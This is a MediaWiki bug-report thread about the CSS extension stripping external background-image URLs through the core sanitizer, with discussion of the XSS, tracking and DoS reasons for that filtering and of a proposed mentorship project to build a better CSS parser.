Last modified: 2014-09-12 09:19:20 UTC
I have been unable to get background-image:url( someURL ) to work with this extension, like below: {{#css: /* This code requires the CSS extension (previously used NewPageCSS) http://www.mediawiki.org/wiki/Extension:CSS */ .someClass { background-image:url(http://www.somedomain.com/w/images/0/06/someimage.png); } }} I believe it is due to Sanitizer::checkCss() as described by Brion here: http://www.gossamer-threads.com/lists/wiki/mediawiki/233179 The CSS that gets sanitized by the parser is getting stripped out of the CSS extension too. However, the usual /* insecure input */ error message appears in the <head> of the page source, like this: <style type="text/css"> /*<![CDATA[*/ /* insecure input */ /*]]>*/ </style> The only way to get around this problem is to put the CSS in MediaWiki:Common.css. There are good reasons for the parser to strip some CSS out, but in addition to documenting this issue (which this bug does, and I'll do in the extension docs in a moment), it should be configurable whether the CSS extension lets the parser sanitize, for example, when used on private wikis.
There is a proposal to improve Extension:CSS at http://www.mediawiki.org/wiki/Mentorship_programs/Possible_projects#Improve_Extension:CSS Pasting the part related with security to get more feedback: "The CSS extension relies on basic blacklisting functionality in MediaWiki core to prevent XSS. It would be great if a proper CSS parser [1] was integrated and a set of whitelists implemented to offer various levels of capability/protection trade-offs. For example, some wikis may want all CSS selectors prefixed with "#mw-content-text" and properties like "position", etc. disabled to limit the effect of styles to the article content. Other sites may want everything except XSS-able properties/values." [1] https://github.com/sabberworm/PHP-CSS-Parser
This project proposal is now featured at https://www.mediawiki.org/wiki/Outreach_Program_for_Women/Round_7
(In reply to comment #1) > "The CSS extension relies on basic blacklisting functionality in MediaWiki > core > to prevent XSS. It would be great if a proper CSS parser [1] was integrated > and > a set of whitelists implemented to offer various levels of > capability/protection trade-offs. This sounds like a great project. I'd recommend looking at HTML Purifier's CSS rules as well, which would be great to integrate into either the extension, or core's CSS sanitization. > [1] https://github.com/sabberworm/PHP-CSS-Parser
> > There are good reasons for the parser to strip some CSS out, but in addition > to > documenting this issue (which this bug does, and I'll do in the extension > docs > in a moment), it should be configurable whether the CSS extension lets the > parser sanitize, for example, when used on private wikis. The reason sanitizer doesn't let that through, is we don't want people to be able to load external resources from inline css *This could in theory be used as a DOS attack against somebody else if someone put it on a popular page. *It can be used to track users, and associate usernames with ip addresses (i.e. have {{REVISIONUSER}} in the query string of the external resource. (There could be other resons. Those two are just the two I know about)
Bug 57891 is not an appropriate "see also"; removing.
A new round of FOSS OPW is coming. Should we keep https://www.mediawiki.org/wiki/Mentorship_programs/Possible_projects#Allowing_3rd_party_wiki_editors_to_run_more_CSS_features as a featured project? Meaning, does this project still make sense and are there mentors still available?
